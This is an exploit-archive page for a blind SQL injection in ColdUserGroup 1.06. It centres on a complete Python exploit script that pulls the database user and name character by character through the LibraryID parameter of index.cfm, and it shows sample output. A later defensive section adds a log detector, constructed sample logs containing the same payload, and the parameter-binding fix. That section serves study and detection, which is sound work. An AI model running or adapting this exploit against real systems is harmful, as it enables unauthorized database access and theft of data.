ColdUserGroup 1.06 Blind SQL Injection

Posted Sep 8, 2010
Authored by mr_me

ColdUserGroup version 1.06 suffers from a remote blind SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 26ec4853bc4e172c9e51243a3094684a

#!/usr/bin/python
# ColdGen - coldusergroup v1.06 0day Remote Blind SQL Injection Exploit
# Vendor: http://www.coldgen.com/
# Found by: mr_me
# ----------------------------------------------->
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# ----------------------------------------------->
# The vulnerabilities:
# ===================
# - Blind SQL Injection in the index.cfm using parameters: ArticleID & LibraryID
# - XSS in the search
#
# This tool assumes the target has a MSSQL backend.
# ./ColdUsrGrp0day.py -p localhost:8080 -s "Author:" -t localhost:8500 -d /coldusrgrp/
#
# | ----------------------------------------------------------------- |
# | -= ColdUserGroup v1.6 0day Remote Blind SQL Injection Exploit =- |
# | -------------------[ by mr_me - net-ninja.net ]------------------ |
#
# (+) Exploiting target @: http://localhost:8500/coldusrgrp/
# (+) Using string 'Author:' for the true page
# (+) This will take time, have patience..
#
# (+) Testing Proxy...
# (+) Proxy @ localhost:8080
# (+) Building Handler..
#
# (!) Getting database user: sa
# (!) Getting database name: coldusergroup

import sys, urllib, re, socket
from optparse import OptionParser

usage = "./%prog [<options>] -s [true string] -t [target] -d [directory]"
usage += "\nExample: ./%prog -p localhost:8080 -s 'Author:' -t localhost:8500 -d /coldusrgrp/"

parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
                  help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
                  help="The Target server <server:port>")
parser.add_option("-d", type="string", action="store", dest="directory",
                  help="Directory path to the CMS")
parser.add_option("-s", type="string", action="store", dest="trueStr",
                  help="String that is on the 'true' page")
(options, args) = parser.parse_args()

def banner():
    print "\n\t| ----------------------------------------------------------------- |"
    print "\t| -= ColdUserGroup v1.6 0day Remote Blind SQL Injection Exploit =- |"
    print "\t| -------------------[ by mr_me - net-ninja.net ]------------------ |\n"

if len(sys.argv) < 5:
    banner()
    parser.print_help()
    sys.exit(1)

def setTargetHTTP():
    if options.target[0:7] != 'http://':
        options.target = "http://" + options.target
    return options.target

def getProxy():
    try:
        proxy = {'http': "http://"+options.proxy}
        opener = urllib.FancyURLopener(proxy)
    except(socket.timeout):
        print "\n(-) Proxy Timed Out"
        sys.exit(1)
    except Exception:
        print "\n(-) Proxy Failed"
        sys.exit(1)
    return opener

# Python 2's urllib has no urllib.error module: HTTP error pages come back as
# ordinary responses and connection failures surface as IOError.
def getRequest(exploit):
    if options.proxy:
        try:
            options.target = setTargetHTTP()
            opener = getProxy()
            check = opener.open(options.target+options.directory+exploit).read()
        except IOError:
            print "(-) Proxy connection failed"
            sys.exit(1)
    else:
        try:
            check = urllib.urlopen(options.target+options.directory+exploit).read()
        except IOError:
            print "(-) Target connection failed, check your address"
            sys.exit(1)
    return check

basicInfo = {'user':'user_name(0)', 'name':'db_name(0)'}

# Compares the character at position x of the queried value against each
# printable ASCII code; the 'true' page string marks a match.
def getBasicInfo(info, x):
    for i in range(32,126):
        request = ("index.cfm?actcfug=LibraryView&LibraryID=209+AND+ISNULL"
        "(ASCII(SUBSTRING(CAST((SELECT+LOWER("+info+"))AS+varchar(8000)),"+str(x)+",1)),0)="+str(i))
        result = getRequest(request)
        if re.search(options.trueStr,result):
            x = x+1
            sys.stdout.write(chr(i))
            getBasicInfo(info, x)

if __name__ == "__main__":
    x = 1
    banner()
    options.target = setTargetHTTP()
    print "(+) Exploiting target @: %s" % (options.target+options.directory)
    print "(+) Using string '%s' for the true page" % (options.trueStr)
    print "(+) This will take time, have patience.."
    if options.proxy:
        print "\n(+) Testing Proxy..."
        print "(+) Proxy @ %s" % (options.proxy)
        print "(+) Building Handler.."

    for key in basicInfo:
        sys.stdout.write("\n(!) Getting database " + key + ": ")
        getBasicInfo(basicInfo[key], x)
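
From the defender's side, the requests described above leave a recognisable trail in web server logs: the normally numeric LibraryID or ArticleID parameter of index.cfm carries extra SQL, and one client repeats the same value with only the trailing comparison number changing. The Python 3 detector below is an added example, not part of the original advisory or script; the log lines, IP addresses, function names and the `min_guesses` threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

ID_PARAMS = {"libraryid", "articleid"}   # parameters the advisory names as injectable
LOG = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) [^"]*" \d{3}')  # combined log format
GUESS = re.compile(r"=\s*(\d+)\s*$")     # trailing "=<n>" that a blind probe varies

def suspicious_params(url):
    """Return [(name, value)] for index.cfm ID parameters that are not plain integers."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("index.cfm"):
        return []
    return [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if k.lower() in ID_PARAMS and not re.fullmatch(r"\d+", v.strip())]

def analyze(lines, min_guesses=3):
    """Return (hits, extraction): all non-integer ID requests, and clients guessing values."""
    hits = []                   # (client, parameter, decoded value)
    runs = defaultdict(set)     # (client, value minus trailing number) -> numbers tried
    for line in lines:
        m = LOG.match(line)
        if not m:
            continue
        client, url = m.groups()
        for name, value in suspicious_params(url):
            hits.append((client, name, value))
            g = GUESS.search(value)
            if g:
                runs[(client, value[:g.start()])].add(g.group(1))
    extraction = sorted({c for (c, _), tried in runs.items() if len(tried) >= min_guesses})
    return hits, extraction

# Constructed sample log (documentation IP ranges), not captured traffic.
_P = ("/coldusrgrp/index.cfm?actcfug=LibraryView&LibraryID=209+AND+ISNULL(ASCII("
      "SUBSTRING(CAST((SELECT+LOWER(db_name(0)))AS+varchar(8000)),1,1)),0)=%d")
SAMPLE = [
    '198.51.100.7 - - [08/Sep/2010:10:00:01 +0000] "GET /coldusrgrp/index.cfm?actcfug=LibraryView&LibraryID=209 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [08/Sep/2010:10:00:02 +0000] "GET /coldusrgrp/index.cfm?ArticleID=12abc HTTP/1.1" 500 310',
] + ['192.0.2.44 - - [08/Sep/2010:10:00:%02d +0000] "GET %s HTTP/1.1" 200 4096' % (i, _P % (97 + i)) for i in range(3, 7)]

if __name__ == "__main__":
    found, clients = analyze(SAMPLE)
    print("non-integer ID requests: %d, extraction-style clients: %s" % (len(found), clients))
```

A non-integer value in either parameter is worth alerting on by itself; the durable fix is to bind the ID as an integer in the query (in CFML, `cfqueryparam` with `cfsqltype="cf_sql_integer"`).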
